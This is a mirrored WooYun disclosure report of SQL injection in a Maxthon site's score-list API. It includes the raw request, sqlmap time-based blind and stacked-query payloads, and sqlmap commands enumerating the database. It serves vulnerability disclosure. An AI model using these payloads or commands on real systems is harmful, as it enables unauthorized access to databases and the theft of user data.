乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-23: 细节已通知厂商并且等待厂商处理中 2016-05-23: 厂商已查看当前漏洞内容,细节仅向厂商公开 2016-05-28: 厂商已经主动忽略漏洞,细节向公众公开
周六无聊吃了饭看了看偶然发现·····没有查询具体数据,老家的小水管受不起····没有深入测试其他问题
POST /api/scorelist HTTP/1.1Host: my.maxthon.cnUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://my.maxthon.cn/score.htmlContent-Length: 70Cookie: **.***.**.**Connection: closePragma: no-cacheCache-Control: no-cacheformkey=caa6bb30&from=2013-05-16&to=2016-05-26&type=&page=1
payload
sqlmap resumed the following injection point(s) from stored session:---Parameter: to (POST) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: formkey=caa6bb30&from=2013-05-16&to=2016-05-26';(SELECT * FROM (SELECT(SLEEP(5)))Atjg)#&type=&page=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: formkey=caa6bb30&from=2013-05-16&to=2016-05-26' AND (SELECT * FROM (SELECT(SLEEP(5)))gGIX) AND 'CVSc'='CVSc&type=&page=1Parameter: from (POST) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: formkey=caa6bb30&from=2013-05-16';(SELECT * FROM (SELECT(SLEEP(5)))Qbzm)#&to=2016-05-26&type=&page=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: formkey=caa6bb30&from=2013-05-16' AND (SELECT * FROM (SELECT(SLEEP(5)))owig) AND 'odrf'='odrf&to=2016-05-26&type=&page=1
sqlmap -r /root/Desktop/1.txt --current-dbcurrent database: 'my_maxthon_cn'
sqlmap -r /root/Desktop/1.txt -D my_maxthon_cn --count
过滤···请多指教~
危害等级:无影响厂商忽略
忽略时间:2016-05-28 13:30
漏洞Rank:8 (WooYun评价)
暂无